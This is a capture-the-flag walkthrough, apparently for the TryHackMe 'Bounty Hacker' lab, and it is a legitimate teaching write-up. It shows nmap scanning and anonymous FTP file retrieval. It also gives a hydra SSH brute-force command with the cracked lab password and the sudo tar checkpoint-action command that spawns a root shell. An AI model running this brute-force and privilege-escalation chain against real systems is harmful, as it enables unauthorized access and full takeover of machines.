# Bounty Hunter ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbCFjpPmr1V9llgJ4Hm%2F-MbDB-qCzkzn4SooRDbq%2Fimage.png?alt=media\&token=51b8de36-0539-4d70-a650-61e27053214c) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.28.194 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbCFjpPmr1V9llgJ4Hm%2F-MbDBViYP0a_GcvJsRQz%2Fimage.png?alt=media\&token=f1a55630-d788-42b1-a5d4-2d8ae733e7af) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 21,22,80 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sC -sV -p 21,22,80 -oN nmap 10.10.28.194 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDBj-3XeBJsMV7gqUR%2F-MbDC6d_a2P5fbCVBYYd%2Fimage.png?alt=media\&token=2c6f5bee-513e-477c-96b5-5752b1967716) ## Enumeration ### Port 21 We can see in the nmap scan that Anonymous FTP login is allowed for port 21: FTP. Lets login and see what it has. ``` ftp 10.10.28.194 ``` Once we login and check the files that it contains, we can see two files `locks.txt` and `task.txt`, lets transfer both of them onto our machine using the command `get`. ``` get ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDCWxMwCjyIqCZacum%2F-MbDDEWaS8tDVEoCtMFd%2Fimage.png?alt=media\&token=002bf3d9-c60f-4556-b3cf-e0153d931abd) Lets read the `task.txt` file first. ``` cat task.txt ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDCWxMwCjyIqCZacum%2F-MbDDRVQAcABydj8Fs0m%2Fimage.png?alt=media\&token=3fdd7182-5d6b-4f22-8387-76c8d42197a2) We found a user called `lin` which is the answer to the third question. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDCWxMwCjyIqCZacum%2F-MbDDYc_yiItjUpjy8ay%2Fimage.png?alt=media\&token=863df2d5-e1a3-46dd-9cfa-55c36ba02f4e) Now lets read the file `locks.txt` ``` cat locks.txt ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDCWxMwCjyIqCZacum%2F-MbDDf97eEodOmCrxSXw%2Fimage.png?alt=media\&token=ec904678-9557-45cd-b624-687ccffb37f2) Looks like a password list. Now with a username and a password list, we can try bruteforcing into ssh using a tool called `hydra`. ## Initial Foothold Command Breakdown: * (**-l**): Specifying username * (**-P**): Specifying a file with passwords to crack the password. * (**ssh**): Specifying which protocol to attack. ``` hydra -l lin -P /root/Desktop/TryHackMe/BountyHacker/locks.txt 10.10.28.194 ssh ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDEBn8N5XMMayVjChr%2Fimage.png?alt=media\&token=2a73c920-1e6f-4676-b18f-7abe64f6bcc4) We found the password `RedDr4gonSynd1cat3`. Lets login through ssh. Also the answer for the fourth question is SSH and the answer to the fifth question is the password we found using hydra. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDF6V8synaYGtIbvjn%2Fimage.png?alt=media\&token=bfd166b5-7927-4369-8ca4-8db8898df1b7) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDFHIe9YJ5hTcOg5eJ%2Fimage.png?alt=media\&token=7a867f45-bbb4-426d-a37f-fdb79f10c9e9) We have user privileges, so we can go read the `user.txt` file, which I already did, but you will have to find that on your own. :) ## Privilege Escalation Lets run the `sudo -l` command to check what files we can run as other users. ``` sudo -l ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDFrcdlTnDVVbFkYfp%2Fimage.png?alt=media\&token=274b673f-bb19-4076-ac70-d58f0cd773d0) Looks like we can run `/bin/tar` as root. Now we can go to [GTFOBins ](https://gtfobins.github.io/gtfobins/tar/#sudo)and find the commands to privilege escalate to root. The command they gave is this. ``` sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh ``` Once we run this, we are root. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDGOJLNB119bAW43q9%2Fimage.png?alt=media\&token=6697233d-5820-4915-90d5-e45139ec3949) Now you can go read the root.txt file and answer the last question.